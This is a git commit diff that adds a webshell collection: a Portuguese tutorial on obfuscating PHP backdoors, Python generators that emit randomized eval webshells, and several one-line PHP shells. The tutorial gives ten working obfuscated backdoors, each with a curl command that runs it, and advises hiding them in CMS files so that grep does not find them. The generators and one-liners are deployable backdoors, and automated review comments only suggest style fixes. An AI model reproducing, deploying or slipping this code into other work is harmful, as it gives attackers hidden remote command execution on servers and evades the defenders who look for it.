$output .= chr($v >> $vbits);
$v &= ((1 << $vbits) - 1);
}
}
return $output;
}
?>


@@ -0,0 +1,11 @@
<?php
function x()
{
return "/*sasas23123*/".$_POST['a']."/*sdfw3123*/";
}
eval(x());
?>

377
php/cotent01.md Normal file

@@ -0,0 +1,377 @@
Esse pequeno post é focado em uma das diferentes técnicas que venho estudando no PHP, mas direcionando no quesito de variação de código para backdoor web.
O cenário de uso dos exemplos abaixo é um pensamento fora da caixa, dando exit() no básico usado em muitos códigos backdoor.
Foquei nas variáveis globais GET ,POST ,REQUEST.
#### As functions mais usadas:
```
(PHP 4, PHP 5, PHP 7)
shell_exec — Executa um comando via shell e retorna a saída inteira como uma string
string shell_exec ( string $cmd )
EXEC-> php -r 'shell_exec("ls -la");'
(PHP 4, PHP 5, PHP 7)
system — Executa um programa externo e mostra a saída
string system ( string $command [, int &$return_var ] )
EXEC-> php -r 'system("ls -la");'
(PHP 4, PHP 5, PHP 7)
exec — Executa um programa externo
string exec ( string $command [, array &$output [, int &$return_var ]] )
EXEC-> php -r 'exec("ls -la",$var);print_r($var);'
(PHP 4, PHP 5, PHP 7)
passthru — Executa um programa externo e mostra a saída crua
void passthru ( string $command [, int &$return_var ] )
EXEC-> php -r 'passthru("ls -la",$var);'
```
#### Implementação simples:
```
shell_exec:
if(isset($_REQUEST['cmd'])) { $cmd=shell_exec($_REQUEST['cmd']);
print_r($cmd);}
system:
if(isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); }
exec:
if(isset($_REQUEST['cmd'])) { exec($_REQUEST['cmd']); }
passthru:
if(isset($_REQUEST['cmd'])) { passthru($_REQUEST['cmd']); }
```
Podemos usar as mesmas functions, porem de forma elaborada evitando que um simples grep -E revele nosso acesso.
#### DICAS:
- Uso de shellcode em valores fixos;
- Array é vida! use sem moderação;
- Concatenação de functions nativas & definição de variáveis.
- base64_decode - encode(data) , bin2hex , error_reporting(0)
- Use requests (get or post) que já existam no sistema;
- Estude a criação de propriedades maliciosas em classs do sistema, crie suas functions;
- Manuseio de valores da variável global $_SERVER;
- Estude métodos de infeção para arquivos CMSs feitos em PHP;
#### Vamos para os exemplos
**EXEMPLO 01**
Functions:
1. [ERROR_REPORTING](https://secure.php.net/manual/pt_BR/function.error-reporting.php)
2. [BASE64_DECODE](http://php.net/manual/pt_BR/function.base64-decode.php)
3. [DEFINE](http://php.net/manual/pt_BR/function.define.php)
4. [SYSTEM](http://php.net/manual/pt_BR/function.system.php)
5. [EXIT](http://php.net/manual/pt_BR/function.exit.php)
Variáveis: c3lzdGVt=system ,dW5hbWUgLWE7bHM7=uname -a;ls; ,aWQ==id
**CODE:**
```
(error_reporting(0).($__=@base64_decode("c3lzdGVt")).$__(base64_decode("aWQ="))
.define("_","dW5hbWUgLWE7bHM7").$__(base64_decode(_)).exit);
```
Execução: curl -v 'http://localhost/shell.php'
**EXEMPLO 02**
Functions:
1. [ERROR_REPORTING](https://secure.php.net/manual/pt_BR/function.error-reporting.php)
2. [BASE64_DECODE](http://php.net/manual/pt_BR/function.base64-decode.php)
3. [ISSET](http://php.net/manual/pt_BR/function.isset.php)
4. [PRINT](http://php.net/manual/pt_BR/function.print.php)
5. [SYSTEM](http://php.net/manual/pt_BR/function.system.php)
6. [EXIT](http://php.net/manual/pt_BR/function.exit.php)
Variáveis: c3lzdGVt=system
**CODE:**
```
(error_reporting(0).($__=@base64_decode("c3lzdGVt"))
.print($__(isset($_REQUEST[0])?$_REQUEST[0]:NULL)).exit);
```
Execução: curl -v 'http://localhost/shell.php?0=id'
**
****EXEMPLO 03**Functions:
1. [ERROR_REPORTING](https://secure.php.net/manual/pt_BR/function.error-reporting.php)
2. [BASE64_DECODE](http://php.net/manual/pt_BR/function.base64-decode.php)
3. [CREATE_FUNCTION](http://php.net/manual/pt_BR/function.create-function.php) - Cria uma função anônima (lambda-style)
4. [SHELL_EXEC](http://php.net/manual/pt_BR/function.shell-exec.php)
5. [EXIT](http://php.net/manual/pt_BR/function.exit.php)
Variáveis: ZWNobyhzaGVsbF9leGVjKCRfKSk7=echo(shell_exec($_));
**CODE:**
```
(error_reporting(0)).($_=$_REQUEST[0])
.($__=@create_function('$_',base64_decode("ZWNobyhzaGVsbF9leGVjKCRfKSk7"))).($__($_).exit);
```
Execução: curl -v 'http://localhost/shell.php?0=id'
**EXEMPLO 04**
Functions:
1. [ERROR_REPORTING](https://secure.php.net/manual/pt_BR/function.error-reporting.php)
2. [VARIABLE FUNCTIONS](http://php.net/manual/pt_BR/functions.variable-functions.php)
3. [EXIT](http://php.net/manual/pt_BR/function.exit.php)
Variáveis: $_GET[1]=Nome da function, $_GET[2]=comando que será executado
**CODE:**
```
(error_reporting(0).($_=@$_GET[1]).($_($_GET[2])).exit);
```
Execução: curl -v 'http://localhost/shell.php?1=system&2=id;uname' **EXEMPLO 05** Functions:
1. [ERROR_REPORTING](https://secure.php.net/manual/pt_BR/function.error-reporting.php)
2. [EXTRACT](http://php.net/manual/pt_BR/function.extract.php)
3. [GET_DEFINED_VARS](http://php.net/manual/pt_BR/function.get-defined-vars.php)
4. [VARIABLE FUNCTIONS](http://php.net/manual/pt_BR/functions.variable-functions.php)
5. [DEFINE](http://php.net/manual/pt_BR/function.define.php)
6. [EXIT](http://php.net/manual/pt_BR/function.exit.php)
Variáveis: $_REQUEST[1]=Nome da function, $_REQUEST[2]=comando que será executado **CODE:**
```
(error_reporting(0)).(extract($_REQUEST, EXTR_PREFIX_ALL))
.($_=@get_defined_vars()['_REQUEST']).(define('_',$_[2])).(($_[1](_))).exit;
```
Execução: curl -v 'http://localhost/shell.php?1=system&2=id;uname'
```
```
**EXEMPLO 06**
Functions:
1. [ERROR_REPORTING](https://secure.php.net/manual/pt_BR/function.error-reporting.php)
2. [EXPLODE](http://php.net/manual/pt_BR/function.explode.php)
3. [BASE64_DECODE](http://php.net/manual/pt_BR/function.base64-decode.php)
4. [VARIABLE FUNCTIONS](http://php.net/manual/pt_BR/functions.variable-functions.php)
5. [EXIT](http://php.net/manual/pt_BR/function.exit.php)
Variáveis: SFRUUF9VU0VSX0FHRU5U=HTTP_USER_AGENT
**CODE:**
```
(error_reporting(0)).($_=@explode(',',$_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')]))
.($_[0]("{$_[1]}")).exit;
```
Execução: curl -v 'http://localhost/shell.php' --user-agent 'system,id;ls -la'
```
```
**EXEMPLO 07**
Functions:
1. [ERROR_REPORTING](https://secure.php.net/manual/pt_BR/function.error-reporting.php)
2. [GET_DEFINED_VARS](http://php.net/manual/pt_BR/function.get-defined-vars.php)
3. [VARIABLE FUNCTIONS](http://php.net/manual/pt_BR/functions.variable-functions.php)
4. [VARIABLE SHELLCODE](https://pt.wikipedia.org/wiki/Shellcode)
5. [SYSTEM](http://php.net/manual/pt_BR/function.system.php)
6. [EXIT](http://php.net/manual/pt_BR/function.exit.php)
Variáveis: \x30=0, \x73=s, \x79=y , \x73=s, \x74=t, \x65=e, \x6D=m
**CODE:**
```
(error_reporting(0)).($_[0][]=@$_GET["\x30"])
.($_[1][] = "\x73").($_[1][] = "\x79").($_[1][] = "\x73")
.($_[1][] = "\x74").($_[1][] = "\x65").($_[1][] = "\x6D")
.($__=@get_defined_vars()['_'][1]).($___.=$__[0])
.($___.=$__[1]).($___.=$__[2]).($___.=$__[3])
.($___.=$__[4]).($___.=$__[5]).(($___("{$_[0][0]}")).exit);
```
Execução: curl -v 'http://localhost/shell.php?0=id;uname%20-a'
**EXEMPLO 08**
Functions:
1. [ERROR_REPORTING](https://secure.php.net/manual/pt_BR/function.error-reporting.php)
2. [STR_REPLACE](http://php.net/manual/pt_BR/function.str-replace.php)
3. [VARIABLE FUNCTIONS](http://php.net/manual/pt_BR/functions.variable-functions.php)
Variáveis: $_REQUEST[0]=Comando que será executado
**CODE:**
```
(error_reporting(0)).(str_replace(['$','@','#'],''
,'s$##y@#$@#$@#$@s$#$@#$@#$@$te$#@#$m')).($_("{$_REQUEST[0]}"));
```
Execução: curl -v 'http://localhost/shell.php?0=id
```
```
**
****EXEMPLO 09**
Functions:
1. [ERROR_REPORTING](https://secure.php.net/manual/pt_BR/function.error-reporting.php)
2. [STR_REPLACE](http://php.net/manual/pt_BR/function.str-replace.php)
3. [VARIABLE FUNCTIONS](http://php.net/manual/pt_BR/functions.variable-functions.php)
4. [SYSTEM](http://php.net/manual/pt_BR/function.system.php)
Variáveis: $_POST['shellrox']=Comando que será executado
**CODE:**
```
(error_reporting(0)).($_=[("\x73\x79").("\x73")
.("\x74\x65\x6d"),"\x73\x68\x65\x6c","\x6c\x72\x6f\x78"])
.($_[0]($_POST[$_[1].$_[2]]));
```
Execução: curl -d "shellrox=id;uname -a" -X POST 'http://localhost/shell.php'
```
```
**
****EXEMPLO 10** Functions:
1. [NON ALPHA NUMERIC](http://www.thespanner.co.uk/2012/08/21/php-nonalpha-tutorial/)
2. [VARIABLE FUNCTIONS](http://php.net/manual/pt_BR/functions.variable-functions.php)
3. [SYSTEM](http://php.net/manual/pt_BR/function.system.php)
**CODE:**
```
$_=""; # we need a blank string to start
$_[+$_]++; # access part of the string to convert to an array
$_=$_.""; # convert the array into a string of "Array"
$_=$_[+""]; # access the 0 index of the string "Array" which is "A"
# INCREMENTANDO VALORES PARA ACHAR AS LETRAS
# NO CASO QUERO MONTAR A STRING SYSTEM
($_++); #A
($_++); #B
($_++); #C
($_++); #D
# PRIMEIRA LETRA ENCONTRADA É JOGADA EM UM ARRAY SECUNDÁRIO
($___[]=$_++);#E
($_++); #F
($_++); #G
($_++); #H
($_++); #I
($_++); #J
($_++); #K
($_++); #L
```
`# LETRA ENCONTRADA É JOGADA EM UM ARRAY SECUNDÁRIO` ($___[]=$_++);#M
```
($_++); #N
($_++); #O
($_++); #P
($_++); #Q
($_++); #R
```
`# LETRA ENCONTRADA É JOGADA EM UM ARRAY SECUNDÁRIO` ($___[]=$_++);#S
`# LETRA ENCONTRADA É JOGADA EM UM ARRAY SECUNDÁRIO` ($___[]=$_++);#T
```
($_++); #U
($_++); #V
($_++); #W
($_++); #X
```
`# LETRA ENCONTRADA É JOGADA EM UM ARRAY SECUNDÁRIO` ($___[]=$_++);#Y
```
($_++);#Z
# DEBUG DO ARRAY:
/* Array
(
[0] => E
[1] => M
[2] => S
[3] => T
[4] => Y
)
*/
# MONTAR STRING COM OS CAMPOS DO ARRAY $___
$_____=$___[2].$___[4].$___[2].$___[3].$___[0].$___[1];
# USANDO TÉCNICA DE FUNCTION ANONIMA PARA EXECUÇÃO
$_____('id;uname -a');
VERSÃO MINIMALISTA:
($_="").($_[+$_]++).($_=$_."").($_=$_[+""]).($_++)
.($_++).($_++).($_++).($___[]=$_++).($_++).($_++)
.($_++).($_++).($_++).($_++).($_++).($___[]=$_++)
.($_++).($_++).($_++).($_++).($_++).($___[]=$_++)
.($___[]=$_++).($_++).($_++).($_++).($_++)
.($___[]=$_++).($_++)
.($_____=$___[2].$___[4].$___[2].$___[3].$___[0].$___[1])
.($_____('id;uname -a'));
```
Execução: curl -v 'http://localhost/shell.php'
#### Observação: Existem outras milhares de técnicas, e tentarei fazer outros posts sobre.
#### Referências
- http://php.net/manual/en/language.operators.execution.php#language.operators.execution
- https://thehackerblog.com/a-look-into-creating-a-truley-invisible-php-shell
- http://www.businessinfo.co.uk/labs/talk/Nonalpha.pdf
- http://php.net/manual/pt_BR/function.create-function.php
- https://blog.sucuri.net/2014/02/php-backdoors-hidden-with-clever-use-of-extract-function.html
- http://web.archive.org/web/20120427221212/http://h.ackack.net/tiny-php-shell.html
- http://php.net/manual/pt_BR/function.extract.php
- http://blog.sucuri.net/2013/09/ask-sucuri-non-alphanumeric-backdoors.html
- https://www.akamai.com/cn/zh/multimedia/documents/report/akamai-security-advisory-web-shells-backdoor-trojans-and-rats.pdf
- https://aw-snap.info/articles/backdoor-examples.php
- http://php.net/manual/pt_BR/reserved.variables.server.php
- http://www.thespanner.co.uk/2011/09/22/non-alphanumeric-code-in-php/
- https://blog.sucuri.net/2013/09/ask-sucuri-non-alphanumeric-backdoors.html
- http://php.net/manual/en/functions.variable-functions.php
- http://php.net/manual/pt_BR/function.exec.php
- http://php.net/manual/pt_BR/function.shell-exec.php
- http://php.net/manual/pt_BR/function.system.php
- http://php.net/manual/pt_BR/function.passthru.php
- http://php.net/manual/pt_BR/function.get-defined-vars.php
- http://php.net/manual/pt_BR/function.extract.php


@@ -0,0 +1,59 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# name: yihuo.py
# http://www.opensource.org/licenses/mit-license
# MIT License
# from: https://www.sqlsec.com/2020/07/shell.html#toc-heading-24
# Copyright (c) 2020
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import string
from urllib.parse import quote
keys = list(range(65)) + list(range(91, 97)) + list(range(123, 127))
results = []
for i in keys:
for j in keys:
asscii_number = i ^ j
if (asscii_number >= 65 and asscii_number <= 90) or (asscii_number >= 97 and asscii_number <= 122):
if i < 32 and j < 32:
temp = (
f'{chr(asscii_number)} = ascii:{i} ^ ascii{j} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number))
results.append(temp)
elif i < 32 and j >= 32:
temp = (
f'{chr(asscii_number)} = ascii:{i} ^ {chr(j)} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number))
results.append(temp)
elif i >= 32 and j < 32:
temp = (
f'{chr(asscii_number)} = {chr(i)} ^ ascii{j} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number))
results.append(temp)
else:
temp = (f'{chr(asscii_number)} = {chr(i)} ^ {chr(j)} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number))
results.append(temp)
results.sort(key=lambda x: x[1], reverse=False)
for low_case in string.ascii_lowercase:
for result in results:
if low_case in result:
print(result[0])
for upper_case in string.ascii_uppercase:
for result in results:
if upper_case in result:
print(result[0])
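Review bot: The three f-strings that print a control-character operand on the right label it `ascii{j}` while the left operand is written `ascii:{i}`, so the generated table is inconsistent for pairs below 32; use `ascii:{j}` in all three branches. The accumulator is also misspelled `asscii_number` throughout the loop body, and `if low_case in result:` relies on tuple membership where `if result[1] == low_case:` states the intent directly. The file carries an MIT header but no description of what it produces; a one-line comment such as `# Enumerate pairs of non-letter ASCII codes whose XOR is a letter and print them grouped by letter` above the `keys` assignment would help a reader.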


@@ -0,0 +1,81 @@
import random
#author: pureqh
#github: https://github.com/pureqh/webshell
#use:GET:http://url?pass=pureqh POST:zero
shell = '''<?php
class {0}{1}
public ${2} = null;
public ${3} = null;
function __construct(){1}
if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){1}
$this->{2} = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
$this->{3} = @{9}($this->{2});
@eval({5}.$this->{3}.{5});
{4}{4}{4}
new {0}();
function {6}(${7}){1}
$BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
${8} = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
$v <<= 8;
$v += ord(${7}[$i]);
$vbits += 8;
while ($vbits >= 5) {1}
$vbits -= 5;
${8} .= $BASE32_ALPHABET[$v >> $vbits];
$v &= ((1 << $vbits) - 1);{4}{4}
if ($vbits > 0){1}
$v <<= (5 - $vbits);
${8} .= $BASE32_ALPHABET[$v];{4}
return ${8};{4}
function {9}(${7}){1}
${8} = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
$v <<= 5;
if (${7}[$i] >= 'a' && ${7}[$i] <= 'z'){1}
$v += (ord(${7}[$i]) - 97);
{4} elseif (${7}[$i] >= '2' && ${7}[$i] <= '7') {1}
$v += (24 + ${7}[$i]);
{4} else {1}
exit(1);
{4}
$vbits += 5;
while ($vbits >= 8){1}
$vbits -= 8;
${8} .= chr($v >> $vbits);
$v &= ((1 << $vbits) - 1);{4}{4}
return ${8};{4}
?>'''
def random_keys(len):
str = '`~-=!@#$%^&_+?<>|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
def random_name(len):
str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
def build_webshell():
className = random_name(4)
lef = '''{'''
parameter1 = random_name(4)
parameter2 = random_name(4)
rig = '''}'''
disrupt = "\"/*"+random_keys(7)+"*/\""
fun1 = random_name(4)
fun1_vul = random_name(4)
fun1_ret = random_name(4)
fun2 = random_name(4)
shellc = shell.format(className,lef,parameter1,parameter2,rig,disrupt,fun1,fun1_vul,fun1_ret,fun2)
return shellc
if __name__ == '__main__':
print (build_webshell())
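Review bot: `random_keys` and `random_name` bind their parameter as `len` and a local as `str`, shadowing two builtins inside the function bodies; the same pattern appears in php/php_webshell.py in this commit. Renaming them, e.g. `def random_name(count):` with `alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'` and `return ''.join(random.sample(alphabet, count))`, keeps the behaviour and reads more clearly. `build_webshell` has no docstring; a one-line one stating that it only fills the module-level `shell` template with the generated names would help, since the template itself is what a reader has to understand.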

1
php/get1.php Normal file

@@ -0,0 +1 @@
<?=`$_GET[C]`?>

27
php/getConstants.php Normal file

@@ -0,0 +1,27 @@
<?php
class Test
{
const a = 'As';
const b = 'se';
const c = 'rt';
public function __construct()
{
}
}
$para1;
$para2;
$reflector = new ReflectionClass('Test');
for ($i=97; $i <= 99; $i++) {
$para1 = $reflector->getConstant(chr($i));
$para2.=$para1;
}
foreach (array('_POST','_GET') as $_request) {
foreach ($$_request as $_key=>$_value) {
$$_key= $_value;
}
}
$para2($_value);

24
php/getConstants2.php Normal file

@@ -0,0 +1,24 @@
<?php
class Test
{
const a = array(1=>'aS',2=>'se',3=>'rT');
public function __construct()
{
}
}
$refl = new ReflectionClass('Test');
foreach ($refl->getConstants() as $key => $value) {
foreach ($value as $key => $value1) {
$value2.=$value1;
}
}
foreach (array('_POST','_GET') as $_request) {
foreach ($$_request as $_key=>$_value) {
$$_key= $_value;
}
}
$value2($_value);

43
php/php_webshell.py Normal file

@@ -0,0 +1,43 @@
import random
#author: pureqh
#github: https://github.com/pureqh/webshell
shell = '''<?php
class {0}{3}
public ${1} = null;
public ${2} = null;
public ${6} = null;
function __construct(){3}
$this->{1} = 'ZXZhbCgkX1BPU';
$this->{6} = '1RbYV0pOw==';
$this->{2} = @base64_decode($this->{1}.$this->{6});
@eval({5}.$this->{2}.{5});
{4}{4}
new {0}();
?>'''
def random_keys(len):
str = '`~-=!@#$%^&_+?<>|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
def random_name(len):
str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
def build_webshell():
className = random_name(4)
parameter1 = random_name(5)
parameter2 = random_name(6)
lef = '''{'''
rig = '''}'''
disrupt = "\"/*"+random_keys(7)+"*/\""
parameter3 = random_name(6)
shellc = shell.format(className,parameter1,parameter2,lef,rig,disrupt,parameter3)
return shellc
if __name__ == '__main__':
print (build_webshell())


@@ -0,0 +1 @@
<?=$_="`{{{"^"?<>/";${$_}[_](${$_}[__]);

1
tdifg/WebShell Submodule

Submodule tdifg/WebShell added at bb669471d2

1
vnhacker1337/Webshell Submodule

Submodule vnhacker1337/Webshell added at ac08d6ddbc

1
xl7dev/WebShell Submodule

Submodule xl7dev/WebShell added at f7cd87feb5

1
ysrc/webshell-sample Submodule

Submodule ysrc/webshell-sample added at dbaeee1622